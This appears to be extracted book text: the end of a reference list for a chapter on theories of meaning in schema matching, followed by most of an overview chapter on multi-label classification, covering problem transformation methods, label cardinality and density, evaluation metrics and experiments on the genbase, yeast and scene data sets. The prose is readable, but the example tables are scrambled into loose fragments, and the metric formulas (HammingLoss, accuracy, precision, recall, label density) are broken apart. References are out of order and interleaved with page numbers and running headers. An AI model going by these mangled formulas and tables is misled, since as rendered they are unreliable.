Doan, A. (2005). Illinois semantic integration archive. Retrieved from http://anhai.cs.uius. edu/archive Doan, A., Domingos, P., & Halevy, A. Y. (2001). Reconciling schemas of disparate data sources: A machine-learning approach. In Proceedings of the 2001 ACM SIGMOD International Conference on Management of Data. Doan, A., Madhavan, J., Dhamankar, R., Domingos, P., & Halevy, A. (2003). Learning to match ontologies on the Semantic Web. The VLDB Journal, 12, 303-319. Doan, A., Madhavan, J., Domingos, P., & Halevy, A. (2002). Learning to map between ontologies on the Semantic Web. In Proceedings of WWW2002, Honolulu, HI (pp. 662-673). Dummett, M. (1993). What do I know when I know a language? In The seas of language. Oxford, United Kingdom: Clarendon Press. Ewens, W. J., & Grant, G. R. (2001). Statistical methods in bioinformatics. New York: Springer Verlag. Fayyad, U. M., Piatetsky-Shapiro, G., Smyth, P., & Uthurusamy, R. (Eds.). (1996). Advances in knowledge discovery and data mining. Cambridge, MA: MIT Press. Fellbaum, C. (1998). WordNet: An electronic lexical database. Cambridge, MA: The MIT Press. Frege, G. (1980). On sense and reference. In P. Geach & M. Black (Eds.), Translations from the philosophical writings of Gottlob Frege (3rd ed., pp. 56-78). Blackwell Publishers.
304
Gotthard, W., Lockemann, P. C., & Neufeld, A. (1992). System-guided view integration for object-oriented databases. IEEE Transactions on Knowledge and Data Engineering, 4(1), 1-22. Grice, H. (1989). Meaning. In Studies in the way of words. Cambridge, MA: Harvard University Press. Guha, R., & Lenat, D. B. (1994). Enabling agents to work together. Communications of the ACM, 37(7), 127-142. Habermas, J. (1979). Communication and the evolution of society. Boston: Beacon Press. Habermas, J. (1981). The theory of communicative action (Vol. 1, T. McCarty, Trans.). Boston: Beacon Press. Haerder, T., & Reuter, A. (1983). Principles of transaction-oriented database recovery. ACM Computing Surveys, 15(4), 287-317. Hakimpour, F., & Geppert, A. (2001). Resolving semantic heterogeneity in schema integration. In Proceedings of the International Conference on Formal Ontology in Information Systems (pp. 297-308). Hamou-Lhdaj, A., & Lethbridge, T. C. (2004). A survey of trace exploration tools and techniques. In Proceedings of the 2004 Conference of the Centre for Advanced Studies on Collaborative Research, Markham, Ontario, Canada (pp. 42-55).
Theories of Meaning in Schema Matching
Hayne, S., & Ram, S. (1990). Multi-user view integration system (MUVIS): An expert system for view integration. In Proceedings of the Sixth International Conference on Data Engineering (pp. 402-409). Hilbert, D. M., & Redmiles, D. F. (2000). Extracting usability information from user interface events. ACM Computing Surveys, 32(4), 384-421. Hipp, J., Güntzer, U., & Nakhaeizadeh, G. (2000). Algorithms for association rule mining: A general survey and comparison. ACM SIGKDD Exploration Newsletter, 2(1), 58-64. Hirsh-Pasek, K., Reeves, L. M., & Golinkoff, R. (1993). Words and meaning: From primitives to complex organization. In J. Gleason & N. Ratner (Eds.), Psycholinguistics (pp. 133-197). Orlando, FL: Holt, Rinehart, &Winston. Jeong, E., & Hsu, C.-N. (2001). Induction of integrated view for XML data with heterogeneous DTDs. In Proceedings of the Tenth International Conference on Information and Knowledge Management (pp. 151-158). Kang, J., & Naughton, J. F. (2003, June 9-12). On schema matching with opaque column names and data values. In Proceedings of SIGMOD 2003, San Diego, CA (pp. 205-216). Keil, F., Smith, W. C., Simons, D. J., & Levin, D. T. (1998). Two dogmas of conceptual empiricism: Implications for hybrid models of the structure of knowledge. Cognition, 65(2), 263-297. Korf, I., Yandell, M., & Bedell, J. (2003). BLAST. Sebastopol, CA: O’Reilly. Kripke, S. (1980). Naming and necessity. Oxford, United Kingdom: Blackwell. Lakatos, I. (1978). Philosophical papers. Cambridge, United Kingdom: Cambridge University Press.
Larson, J., Navathe, S., & Elmasri, R. (1989). A theory of attribute equivalence in databases with application to schema integration. IEEE Transactions on Software Engineering, 15(4), 449-463. Lenat, D. B. (1995). CYC: A large-scale investment in knowledge infrastructure. Communications of the ACM, 38(11), 33-38. Lenat, D. B., Guha, R. V., Pittman, K., Pratt, D., & Shepherd, M. (1990). CYC: Toward programs with common sense. Communications of the ACM, 33(8), 30-49. Lerner, B. S. (2000). A model for compound type changes encountered in schema evolution. ACM Transactions on Database Systems, 25(1), 83-127. Li, W.-S., & Clifton, C. (1996). Dynamic integration in multidatabase systems. Journal of Database Management, 7(1), 28-40. Li, W.-S., & Clifton, C. (2000). SEMINT: A tool for identifying attribute correspondences in heterogeneous databases using neural networks. Data and Knowledge Engineering, 33, 49-84. Li, W.-S., Clifton, C., & Liu, S.-Y. (2000). Database integration using neural networks: Implementation and experiences. Knowledge and Information Systems, 2(1), 73-96. Lueker, G. S., & Booth, K. S. (1979). A linear time algorithm for deciding interval graph isomorphism. Journal of the Association for Computing Machinery, 26(2), 183-195. Mannino, M. V., Chu, P., & Sager, T. (1988). Statistical profile estimation in database systems. ACM Computing Surveys, 20(3), 191-221. McNamara, T. P., & Miller, D. L. (1989). Attributes of theories of meaning. Psychological Bulletin, 106(3), 355-376.
305
Theories of Meaning in Schema Matching
Melnik, S., Garcia-Molina, H., & Rahm, E. (2002). Similarity flooding: A versatile graph matching algorithm and its application to schema matching. In Proceedings of the 18th International Conference on Data Engineering (ICDE’02) (pp. 117-128). Miller, R. J., Hernandez, M. A., Haas, L. M., Yan, L., Ho, C. H., Fagin, R., et al. (2001). The Clio project: Managing heterogeneity. ACM SIGMOD Record, 30(1), 78-83. Mitra, P., Wiederhold, G., & Kersten, M. (2000). A graph-oriented model for articulation of ontology interdependencies. In Proceedings of the Seventh International Conference on Extending Database Technology EDBT (pp. 86-100). Murphy, G. L. (2002). The big book of concepts. Cambridge, MA: The MIT Press. Murphy, P. (1985). Meaning, truth and ethical value (Part 1). Praxis International, 5(3), 224246.
International Conference on Information and Knowledge Management (pp. 306-313). Palopoli, L., Sacca, D., & Ursino, D. (1998b). Semi-automatic semantic discovery of properties from database schemes. In Proceedings of the International Database Engineering and Applications Symposium (pp. 244-253). Paton, N. W. (Ed.). (1998). Active rules in database systems. New York: Springer Verlag. Paton, N. W., & Diaz, O. (1999). Active database systems. ACM Computing Surveys, 31(1), 63-103. Putnam, H. (1975). The meaning of meaning. In Mind, language and reality: Philosophical papers (Vol. 1). Cambridge, United Kingdom: Cambridge University Press. Putnam, H. (1981). Reason, truth and history. Cambridge, United Kingdom: Cambridge University Press.
Murphy, P. (1987). Meaning, truth and ethical value (Part 2). Praxis International, 7(1), 35-56.
Quine, W. v. O. (1953). Two dogmas of empiricism. In From a logical point of view. Cambridge, MA: Harvard University Press.
Noy, N., & Musen, M. (2001). Anchor-PROMPT: Using non-local context for semantic matching. In Workshop on Ontologies and Information Sharing at the Seventh International Joint Conference on Artificial Intelligence IJCAI, Seattle, WA.
Rahm, E., & Bernstein, P. A. (2001). A survey of approaches to automatic schema matching. The International Journal on Very Large Databases, 10(4), 334-350.
Noy, N., & Musen, M. (2003). The PROMPT suite: Interactive tools for ontology merging and mapping. International Journal of Human-Computer Studies, 59(6), 983-1024. Palopoli, L., Sacca, D., Terracina, G., & Ursino, D. (2003). Uniform techniques for deriving similarities of objects and subschemas in heterogeneous databases. IEEE Transactions on Knowledge and Data Engineering, 15(2), 271-294. Palopoli, L., Sacca, D., & Ursino, D. (1998a). An automatic technique for detecting type conflicts in database schema. In Proceedings of the Seventh
306
Ramakrishnan, R., & Gehrke, J. (2003). Database management systems (3rd ed.). Boston: McGrawHill. Rescher, N. (1973). The coherence theory of truth. Oxford, United Kingdom: Oxford University Press. Ricoeur, P. (1976). Interpretation theory: Discourse and the surplus of meaning. Fort Worth, TX: The Texas Christian University Press. Ricoeur, P. (1977). The rule of metaphor. Toronto, Ontario, Canada: University of Toronto Press.
Theories of Meaning in Schema Matching
Ricoeur, P. (1978). The philosophy of Paul Ricoeur: An anthology of his work. Boston: Beacon Press. Rosaci, D., Terracina, G., & Ursino, D. (2001). Deriving sub-source similarities from heterogeneous, semi-structured information sources. In Proceedings of the Ninth International Conference on Cooperative Information Systems (CoopIS) (pp. 163-178). Rosch, E. (1973). On the internal structure of perceptual and semantic categories. In T. Moore (Ed.), Cognitive development and the acquisition of language. New York: Academic Press. Rosch, E. (1975). Cognitive representations of semantic categories. Journal of Experimental Psychology: General, 104, 192-233. Rosch, E., & Mervis, C. (1975). Family resemblances: Studies in the internal structure of categories. Cognitive Psychology, 7, 573-605. Rosemann, M., & Green, P. (2000). Integrating multi-perspective views into ontological analysis. In Proceedings of the 21st International Conference on Information Systems (pp. 618-627). Rosemann, M., & Green, P. (2002). Developing a meta-model for the Bunge-Wand-Weber ontological constructs. Information Systems, 27(2), 75-91. Russell, B. (1905). On denoting. Mind, 14, 479493. Russell, B. (1956). Descriptions and incomplete symbols. In Logic and knowledge: Essays, 19011950. London: Allen & Unwin. Sanderson, P. M., & Fisher, C. (1994). Exploratory sequential data analysis: Foundations. Human Computer Interaction, 9. Saussure, F. (1966). Course in general linguistics. New York: McGraw-Hill.
Scheuermann, P., Li, W.-S., & Clifton, C. (1996). Dynamic integration and query processing with ranked role sets. In Proceedings of the First IFCIS International Conference on Cooperative Information Systems (pp. 157-166). Searle, J. (1969). Speech acts. Cambridge, United Kingdom: Cambridge University Press. Sowa, J. F. (1984). Conceptual structures: Information processing in mind and machine. Reading, MA: Addison-Wesley. Sowa, J. F. (2000). Knowledge representation: Logical, philosophical, and computational foundations. Pacific Grove, CA: Brooks Cole. Spaccapietra, S., & Parent, C. (1994). View integration: A step forward in solving structural conflicts. IEEE Transactions on Knowledge and Data Engineering, 6(2). 258-274. Strawson, P. (1950). On referring. Mind, 59, 320-344. Su, X., Brasethvik, T., & Hakkarainen, S. (2003). Ontology mapping through analysis of model extension. In Proceedings of the Forum of the 11th International Conference on Advances in Information Systems Engineering (CAiSE), Velden, Austria. Su, X., & Gulla, J. A. (2004). Semantic enrichment for ontology mapping. In Proceedings of the Ninth International Conference on Applications of Natural Language to Information Systems (pp. 217-228). Su, X., Gulla, J. A. (2006). An information retrieval approach to ontology mapping. Data & Knowledge Engineering, 58(1), 47-69. Su, X., Hakkarainen, S., & Brasethvik, T. (2004). Semantic enrichment for improving system interoperability. In Proceedings of the 19th ACM Symposium on Applied Computing (SAC 04), Nicosia, Cyprus (pp. 1634-1641).
307
Theories of Meaning in Schema Matching
Sure, Y., Corcho, O., Euzenat, J., & Hughes, T. (Eds.). (2004, November). In Third International Workshop on Evaluation of Ontology-Based Tools, Hiroshima, Japan.
Weber, R. (1997). Ontological foundations of information systems. Coopers & Lybrand. Weber, R. (2003). Still desperately seeking the IT artifact. MIS Quarterly, 27(2), iii-xi.
Tarski, A. (1935). The concept of truth in formalized languages. In Logic, semantics, metamathematics (2nd ed., pp. 152-278). Indianapolis, IN: Hacket.
Webster, J., & Watson, R. T. (2002). Analyzing the past to prepare for the future: Writing a literature review. MIS Quarterly, 26(2), xiii-xxiii.
Toulmin, S. (1958). The uses of argument. Cambridge, United Kingdom: Cambridge University Press.
Wieringa, R. J. (1999). Design methods for reactive systems: Yourdon, Statemate and the UML (Tech. Rep.). The Netherlands: University of Twente, Department of Computer Science.
Ullmann, J. (1976). An algorithm for subgraph isomorphism. Journal of the Association for Computing Machinery, 23(1), 31-42.
Wittgenstein, L. (1953). Philosophical investigations. Englewood Cliffs, NJ: Prentice Hall.
Wand, Y., & Weber, R. (1990). Mario Bunge’s ontology as a formal foundation for information systems concepts. In P. Weingartner & G. J. W. Dorn (Eds.), Studies on Mario Bunge’s treatise. Atlanta, GA: Rodopi. Wand, Y., & Weber, R. (2002). Research commentary: Information systems and conceptual modeling. A research agenda. Information Systems Research, 13(4), 363-376. Wang, T.-L. J., Zhang, K., Jeong, K., & Shasha, D. (1994). A system for approximate tree matching. IEEE Transactions on Knowledge and Data Engineering, 6(4), 559-571. Wang, T.-W., & Murphy, K. E. (2004). Semantic heterogeneity in multidatabase systems: A review and a proposed meta-data structure. Journal of Database Management, 15(4), 71-87.
Yeh, P. Z., Porter, B., & Barker, K. (2003). Using transformations to improve semantic matching. In Proceedings of K-CAP’03, Sanibel Island, FL (pp. 180-189). Young, J. (2001). A defence of the coherence theory of truth. The Journal of Philosophical Research, 26, 89-101. Zhang, X., & Gupta, R. (2005). Whole execution traces and their applications. ACM Transactions on Architecture and Code Optimization, 2(3), 301-334. Zhao, H., & Ram, S. (2004). Clustering schema elements for semantic integration of heterogeneous data sources. Journal of Database Management, 15(4), 88-106.
This work was previously published in Journal of Database Management, Vol. 19, Issue 3, edited by K. Siau, pp. 55-82, copyright 2008 by IGI Publishing (an imprint of IGI Global).
308
309
Chapter 1.21
Multi-Label Classification: An Overview
Grigorios Tsoumakas Aristotle University of Thessaloniki, Greece Ioannis Katakis Aristotle University of Thessaloniki, Greece
ABSTRACT Multi-label classification methods are increasingly required by modern applications, such as protein function classification, music categorization, and semantic scene classification. This article introduces the task of multi-label classification, organizes the sparse related literature into a structured presentation and performs comparative experimental results of certain multi-label classification methods. It also contributes the definition of concepts for the quantification of the multi-label nature of a data set.
INTRODUCTION Traditional single-label classification is concerned with learning from a set of examples that are associated with a single label l from a set of disjoint labels L, |L| > 1. If |L| = 2, then the learning
problem is called a binary classification problem (or filtering, in the case of textual and Web data), while if |L| > 2, then it is called a multiclass classification problem. In multi-label classification, the examples are associated with a set of labels Y ⊆ L. In the past, multi-label classification was mainly motivated by the tasks of text categorization and medical diagnosis. Text documents usually belong to more than one conceptual class. For example, a newspaper article concerning the reactions of the Christian church to the release of the Da Vinci Code film can be classified into both of the categories society\religion and arts\movies. Similarly, in medical diagnosis, a patient may be suffering, for example, from diabetes and prostate cancer at the same time. Nowadays, we notice that multi-label classification methods are increasingly required by modern applications, such as protein function classification (Elisseeff & Weston, 2002), music
categorization (Li & Ogihara, 2003), and semantic scene classification (Boutell, Luo, Shen, & Brown, 2004). In semantic scene classification, a photograph can belong to more than one conceptual class at the same time, such as sunsets and beaches. Similarly, in music categorization, a song may belong to more than one genre. For example, several hit songs of the popular rock band Scorpions can be characterized as both rock and ballad. This article aims to serve as a starting point and reference for researchers interested in multilabel classification. The main contributions are: a) a structured presentation of the sparse literature on multi-label classification methods with comments on their relative strengths and weaknesses, and, when possible, the abstraction of specific methods to more general and thus more useful schemata; b) the introduction of an undocumented multi-label method; c) the definition of a concept for the quantification of the multi-label nature of a data set; and d) preliminary comparative experimental results about the performance of certain multi-label methods. The remainder of the article is organized as follows. The next section discusses tasks that are related to multi-label classification. Subsequently follows an organized presentation of multi-label classification methods. The next section introduces the concept of label density, and presents the metrics that have been proposed in the past for the evaluation of multi-label classifiers. The following section presents the comparative experiments and discusses the results, while the concluding section summarizes this work and points to future research directions.
RELATED TASKS A task that also belongs to the general family of supervised learning and is very relevant to multi-label classification is that of ranking. In ranking, the task is to order a set of labels L, so
310
that the topmost labels are more related to the new instance. There exist a number of multi-label classification methods that learn a ranking function from multi-label data. However, a ranking of labels requires postprocessing in order to give a set of labels, which is the proper output of a multi-label classifier. In certain classification problems, the labels belong to a hierarchical structure. The dmoz open directory, for example (http://www.dmoz.org/), maintains a hierarchy of conceptual classes for the categorization of Web pages. A Web page may be labelled using one or more of those classes, which can belong to different levels of the hierarchy. The top level of the Munich Information Centre for Protein Sequences (MIPS) hierarchy (http://mips. gsf.de/) consists of classes, such as metabolism, energy, transcription, and protein synthesis. Each of these classes is then subdivided into more specific classes, and these are in turn subdivided, and then again subdivided, so the hierarchy is up to four levels deep (Clare & King, 2001). When the labels in a data set belong to a hierarchical structure, then we call the task hierarchical classification. If each example is labelled with more than one node of the hierarchical structure, then the task is called hierarchical multi-label classification. In this article, we focus on flat (nonhierarchical) multi-label classification methods. Jin and Ghahramani (2002) call multiple-label problems, the semisupervised classification problems, where each example is associated with more than one class, but only one of those classes is the true class of the example. This task is not that common in real-world applications as the one we are studying. Multiple-instance learning is a variation of supervised learning, where the task is to learn a concept given positive and negative bags of instances (Maron & Lozano-Perez, 1997). Each bag may contain many instances, but a bag is labelled positive even if only one of the instances in it falls within the concept. A bag is labelled negative only if all the instances in it are negative.
Multi-Label Classification
MULTI-LABEL CLASSIFICATION METHODS
To exemplify these methods we will use the data set of Table 1. It consists of four examples
(documents in this case) that belong to one or more of four classes: sports, religion, science, and politics. There exist two straightforward problem transformation methods that force the learning problem into traditional single-label classification (Boutell et al., 2004). The first one (dubbed PT1) subjectively or randomly selects one of the multiple labels of each multi-label instance and discards the rest, while the second one (dubbed PT2) simply discards every multi-label instance from the multi-label data set. Tables 2 and 3 show the transformed data set using methods PT1 and PT2, respectively. These two problem transformation methods discard a lot of the information content of the original multi-label data set and, therefore, are not considered further in this work. The third problem transformation method that we will mention (dubbed PT3) considers each different set of labels that exist in the multi-label
Table 1. Example of a multi-label data set
Table 3. Transformed data set using PT2
We can group the existing methods for multi-label classification into two main categories: a) problem transformation methods and b) algorithm adaptation methods. We define problem transformation methods as those methods that transform the multi-label classification problem either into one or more single-label classification or regression problems, for both of which there exists a huge bibliography of learning algorithms. We define algorithm adaptation methods as those methods that extend specific learning algorithms in order to handle multi-label data directly.
Problem Transformation Methods
Example 1 2 3 4
Sports
Religion
Science
X X
Politics X X
Example 3
Sports
Religion
Science
Politics
X
X X
X
Table 4. Transformed data set using PT3 Table 2. Transformed data set using PT1 Example 1 2 3 4
Sports
Religion
Science
Politics
X X X X
Example 1 2 3 4
Sports
(Sports ∧ Politics) X
(Science ∧ Politics)
(Science ∧ Religion)
X X X
311
Multi-Label Classification
data set as a single label. It learns one single-label classifier H: X → P(L) , where P(L) is the power set of L. Table 4 shows the result of transforming the data set of Table 1 using this method. One of the negative aspects of PT3 is that it may lead to data sets with a large number of classes and few examples per class. PT3 has been used in the past by Boutell et al. (2004) and Diplaris, Tsoumakas, Mitkas, and Vlahavas (2005). The most common problem transformation method (dubbed PT4) learns |L| binary classifiers Hl: X → {l, ¬l}, one for each different label l in L. It transforms the original data set into |L| data sets Dl that contain all examples of the original data set, labelled as l, if the labels of the original example contained l and as ¬l otherwise. It is the same solution used in order to deal with a single-label multi-class problem using a binary classifier. For the classification of a new instance x, this method outputs as a set of labels, the union of the labels that are output by the |L| classifiers:
H PT 4 (x ) = ∪ {l}: H l (x ) = l. l∈L
Figure 1 shows the four data sets that are constructed by PT4, when applied to the data set of Table 1. PT4 has been used in the past by Boutell) (2004), Goncalves and Quaresma (2003), Lauser and Hotho (2003), and Li & Ogihara (2003). A straightforward, yet undocumented, problem transformation method is the following (dubbed PT5). Firstly, it decomposes each example (x, Y) into |Y| examples (x, l) for all l ∈ Y. Then it learns one single-label distribution classifier from the transformed data set. Distribution classifiers are those classifiers that can output a distribution of certainty degrees (or probabilities) for all labels in L. Finally, it postprocesses this distribution to output a set of labels. One simple way to achieve this is to output those labels for which the certainty degree is greater than a specific threshold (e.g., 0.5). A more complex way is to output those labels for which the certainty degree is greater than a percentage (e.g., 70%) of the highest certainty
Figure 1. The four data sets that are constructed by PT4 Example 1 2 3 4
Sports X
¬Sports X
X X
Example 1 2 3 4
(a)
Example 1 2 3 4
Religion
X
(c)
312
Politics X X
¬Politics
X X
(b)
¬Religion X X X
Example 1 2 3 4
Science
¬Science X
X X X
(d)
Multi-Label Classification
Table 5. Transformed data set using PT5 Example 1 1 2 2 3 4 4
Class Sports Politics Science Politics Sports Religion Science
Table 6. Transformed data set using PT6 Example 1 1 1 1 2 2 2 2 3
degree. Table 5 shows the result of transforming the data set of Table 1 using this method.
Algorithm Adaptation Methods
3 3 3 4 4
Clare and King (2001) adapted the C4.5 algorithm for multi-label data. They modified the formula of entropy calculation as follows:
entropy (S ) = −∑ ( p (ci )log p (ci ) + q (ci )log q (ci )) i =1
,
where p(ci) = relative frequency of class ci and q(ci) = 1−p(ci). They also allowed multiple labels in the leaves of the tree. Adaboost.MH and Adaboost.MR (Schapire & Singer, 2000) are two extensions of AdaBoost (Freund & Schapire, 1997) for multi-label classification. They both apply AdaBoost on weak classifiers of the form H:X ×L → R. In AdaBoost. MH, if the sign of the output of the weak classifiers is positive for a new example x and a label l, then we consider that this example can be labelled with l; while if it is negative, then this example is not labelled with l. In AdaBoost.MR, the output of the weak classifiers is considered for ranking each of the labels in L. Although these two algorithms are adaptations of a specific learning approach, we notice that at their core, they actually use a problem trans-
formation (dubbed PT6). Each example (x, Y) is decomposed into |L| examples (x, l, Y[l]), for all l ∈ L, where Y[l] = 1, if l ∈ Y, and [l] = −1 otherwise. Table 6 shows the result of transforming the data set of Table 1 using this method. ML-kNN (Zhang & Zhou, 2005) is an adaptation of the kNN lazy learning algorithm for multi-label data. Actually this method follows the paradigm of PT4. In essence, ML-kNN uses the kNN algorithm independently for each label l: It finds the k nearest examples to the test instance and considers those that are labelled at least with l as positive and the rest as negative. What mainly differentiates this method from the application of the original kNN algorithm to the transformed problem using PT4 is the use of prior probabilities.
313
Multi-Label Classification
ML-kNN also has the capability of producing a ranking of the labels as an output. Luo and Zincir-Heywood (2005) present two systems for multi-label document classification, which also are based on the kNN classifier. The main contribution of their work is on the preprocessing stage for the effective representation of documents. For the classification of a new instance, the systems initially find the k nearest examples. Then for every appearance of each label in each of these examples, they increase a corresponding counter for that label. Finally, they output the N labels with the largest counts. N is chosen based on the number of labels of the instance. This is an inappropriate strategy for real-world use, where the number of labels of a new instance is unknown. McCallum (1999) defines a probabilistic generative model according to which each label generates different words. Based on this model, a multi-label document is produced by a mixture of the word distributions of its labels. The parameters of the model are learned by maximum a posteriori estimation from labelled training documents, using expectation maximization to calculate which labels were both the mixture weights and the word distributions for each label. Given a new document, the label set that is most likely is selected by Bayes rule. This approach for the classification of a new document actually follows the paradigm of PT3, where each set of labels is considered independently as a new class. Elisseeff and Weston (2002) present a ranking algorithm for multi-label classification. Their algorithm follows the philosophy of support vector machines (SVMs). It is a linear model that tries to minimize a cost function, while maintaining a large margin. The cost function they use is ranking loss, which is defined as the average fraction of pairs of labels that are ordered incorrectly. However, as stated earlier, the disadvantage of a ranking algorithm is that it does not output a set of labels.
314
Godbole and Sarawagi (2004) present two improvements for the SVM classifier in conjunction with the PT4 method for multi-label classification. The first improvement easily could be abstracted in order to be used with any classification algorithm and, thus, could be considered an extension to PT4. The main idea is to extend the original data set with |L| extra features containing the predictions of each binary classifier. Then a second round of training |L| new binary classifiers takes place, this time using the extended data sets. For the classification of a new example, the binary classifiers of the first round are initially used, and their output is appended to the features of the example to form a meta-example. This metaexample is then classified by the binary classifiers of the second round. Through this extension, the approach takes into consideration the potential dependencies among the different labels. Note here that this improvement is actually a specialized case of applying Stacking (a method for the combination of multiple classifiers) (Wolpert, 1992) on top of PT4. The second improvement of Godbole and Sarawagi (2004) is SVM specific and concerns the margin of SVMs in multi-label classification problems. They improve the margin by a) removing very similar negative training instances, which are within a threshold distance from the learned hyperplane, and b) removing negative training instances of a complete class, if it is very similar to the positive class, based on a confusion matrix that is estimated using any fast and moderately accurate classifier on a held-out validation set. Note here that the second approach for margin improvement is actually SVM independent. Therefore, it could also be used as an extension to PT4. MMAC (Thabtah, Cowling, & Peng, 2004) is an algorithm that follows the paradigm of associative classification, which deals with the construction of classification rule sets using association rule mining. MMAC learns an initial
Multi-Label Classification
set of classification rules through association rule mining, removes the examples associated with this rule set, and recursively learns a new rule set from the remaining examples until no further frequent items are left. These multiple rule sets might contain rules with similar preconditions but different labels on the right hand side. Such rules are merged into a single multi-label rule. The labels are ranked according to the support of the corresponding individual rules.
used to quantify the number of alternative labels that characterize the examples of a multi-label training data set. Label density takes into consideration the number of labels in the classification problem. Two data sets with the same label cardinality, but with a great difference in the number of labels (different label density), might not exhibit the same properties and cause different behavior to the multi-label classification methods. The two metrics are related to each other: LC(D) = |L| LD(D).
ISSUES
Evaluation Metrics
How Much Multi-Label is a Data Set? Not all data sets are equally multi-label. In some applications, the number of labels for each example is small compared to |L|, while in others it is large. This could be a parameter that influences the performance of the different multi-label methods. Here we introduce the concepts of label cardinality and label density of a data set. Let D be a multi-label data set consisting of |D| multilabel examples (xi, Yi), i = 1..|D|.
Multi-label classification requires different metrics than those used in traditional single-label classification. This section presents the various metrics that have been proposed in the literature. Let D be a multi-label evaluation data set, consisting of |D| multi-label examples (xi, Yi), i = 1..|D|, Yi ⊆ L. Let H be a multi-label classifier and Zi = H(xi) be the set of labels predicted by H for example xi. Schapire and Singer (2000) consider the HammingLoss, which is defined as:
•
HammingLoss(H, D)= 1
Definition 1: Label cardinality of D is the average number of labels of the examples in D,
LC(D)= 1 D •
D
∑Y . i =1
i
Definition 2: Label density of D is the average number of labels of the examples in D divided by |L|,
1 LD(D)= D
D
∑ i =1
Yi . L
Yi ΔZ i L
D
∑ D i =1
,
where Δ stands for the symmetric difference of two sets and corresponds to the XOR operation in Boolean logic. The following metrics are used by Godbole and Sarawagi (2004) for the evaluation of H on D: 1
Accuracy(H, D)= D Precision(H,
1 D)= D
D
Yi ∩ Z i
∑ Y ∪Z , i =1
D
∑ i =1
i
i
Yi ∩ Z i Zi
,
and Label cardinality is independent of the number of labels |L| in the classification problem, and is
1
Recall(H, D)= D
D
∑ i =1
Yi ∩ Z i Yi
.
315
Multi-Label Classification
Boutell et al. (2004) give a more generalized version of the above accuracy using a parameter α ≥ 0, called forgiveness rate: Accuracy(H, D)=
1 D
D
⎛ Yi ∩ Z i ⎞
i =1
⎝
∑ ⎜⎜ Y ∪ Z ⎟⎟ . i
i
⎠
This parameter is used in order to control the forgiveness of errors that are made in predicting labels. They also give an even more generalized version of the accuracy by introducing two additional parameters in order to allow different costs for false positives and true negatives. These two general measures of accuracy are too complex, due to the additional parameters, but could be useful in certain applications.
EXPERIMENTAL COMPARISON OF PT METHODS We implemented the PT3, PT4, and PT6 methods in Java, within the framework of the WEKA (Witten & Frank, 1998) library of machine learning algorithms, and made the software publicly available at the following URL (mlkd.csd.auth. gr/multilabel.html). We experimented with the three PT methods in conjunction with the following classifier learning algorithms: kNN (Aha, Kibler, & Albert, 1991), C4.5 (Quinlan, 1993), naive Bayes (John & Langley, 1995), and SMO (Platt, 1998). For performance evaluation, we used the HammingLoss, Accuracy, Precision,
and Recall metrics that were presented in the previous section. We experimented on the following multi-label data sets genbase (Diplaris et al., 2005) and yeast (Elisseeff & Weston, 2002), which are biological data sets that are concerned with protein function classification and gene function classification, respectively. The scene data set (Boutell et al., 2004) contains data related to a scene classification problem. These data sets were retrieved from the site of the support vector classification library (LIBSVM) (Chang & Lin, 2001), and transformed to a specific format that is suitable for our software, based on the ARFF file format of the WEKA library. The transformed data sets also are available at the aforementioned URL. The details of the data sets, such as the number of examples, the number of numeric and discrete attributes, the number of classes, and their label density are given in Table 7. We notice that genbase (LD = 0.05) and scene (LD = 0.18) are quite sparse multi-label data sets with less than 1.5 labels per example on average. The yeast dataset on the other hand is denser (LD = 0.30) with more than 4 labels per example on average. Table 8 presents analytical results on the three data sets. We will first discuss the results in terms of accuracy. The combination of the PT3 method together with the SMO learning algorithm gives the best results in each of the three data sets. In addition the PT3 method has the highest mean accuracy for all learning algorithms in each of the three data sets, followed by PT4 and then
Table 7. Examples, numeric and discrete attributes, labels, and LD of data sets Data set genbase yeast scene
by PT6. This means that it is the best method independent of the learning algorithm in each of the three data sets. This is an interesting result, given that the PT3 method is not as popular in the literature as PT4. We will now discuss the results in terms of HammingLoss. In genbase, the best results are obtained with PT4 in combination with either kNN or SMO. In yeast, the best results are obtained again with PT4 in combination with SMO, while in scene the best results are obtained with PT3 in conjunction with SMO. Independent of the algorithm used, PT3 is the best method in scene, PT4 in genbase, and PT6 in yeast. One noteworthy result is that PT6 does not perform well in combination with SMO for the scene and genbase data sets. Note that these two data sets are quite sparse as LD(scene) = 0.18 and LD(genbase) = 0.05. This means that after the transformation, the class attribute will have a large number of examples with a value of –1. It seems that in these cases SMO learns to predict always –1. This leads to zero accuracy, precision, and recall, while HammingLoss becomes equal to the label density of the data set.
CONCLUSION AND FUTURE WORK This work was involved with the task of multi-label classification. It introduced the problem, gave an organized presentation of the methods that exist in the literature, and provided comparative experimental results for some of these methods. To the best of our knowledge, there is no other review article on the interesting and upcoming task of multi-label classification. In the future we intend to perform a finergrained categorization of the different multi-label classification methods and perform more extensive experiments with more data sets and methods. We also intend to perform a comparative experimental study of problem adaptation methods.
318
REFERENCES Aha, D. W., Kibler, D., & Albert, M. K. (1991). Instance-based learning algorithms. Machine Learning, 6(1), 37-66. Boutell, M. R., Luo, J., Shen, X., & Brown, C. M. (2004). Learning multi-label scene classification. Pattern Recognition, 37(9), 1757-1771. Chang, C.-C., & Lin, C.-J. (2004). LIBSVM : A library for support vector machines. Retrieved from http://www.csie.ntu.edu.tw/~cjlin/libsvm Clare, A., & King, R. D., (2001). Knowledge discovery in multi-label phenotype data. Proceedings of the 5th European Conference on Principles of Data Mining and Knowledge Discovery (PKDD 2001), . Diplaris, S., Tsoumakas, G., Mitkas, P., & Vlahavas, I. (2005). Protein classification with multiple algorithms. Proceedings of the 10th Panhellenic Conference on Informatics (PCI 2005). Elisseeff, A., & Weston, J. (2002). A kernel method for multi-labelled classification. Paper presented to Advances in Neural Information Processing Systems 14. Freund, Y., & Schapire, R. E. (1997). A decisiontheoretic generalization of on-line learning and an application to boosting. Journal of Computer and System Sciences, 55(1), 119-139. Godbole, S., & Sarawagi, S. (2004). Discriminative methods for multi-labeled classification. Proceedings of the 8th Pacific-Asia Conference on Knowledge Discovery and Data Mining (PAKDD 2004). Goncalves, T., & Quaresma, P. (2003). A preliminary approach to the multilabel classification problem of Portuguese juridical documents. Proceedings of the 11th Portuguese Conference on Artificial Intelligence (EPIA ‘03).
Multi-Label Classification
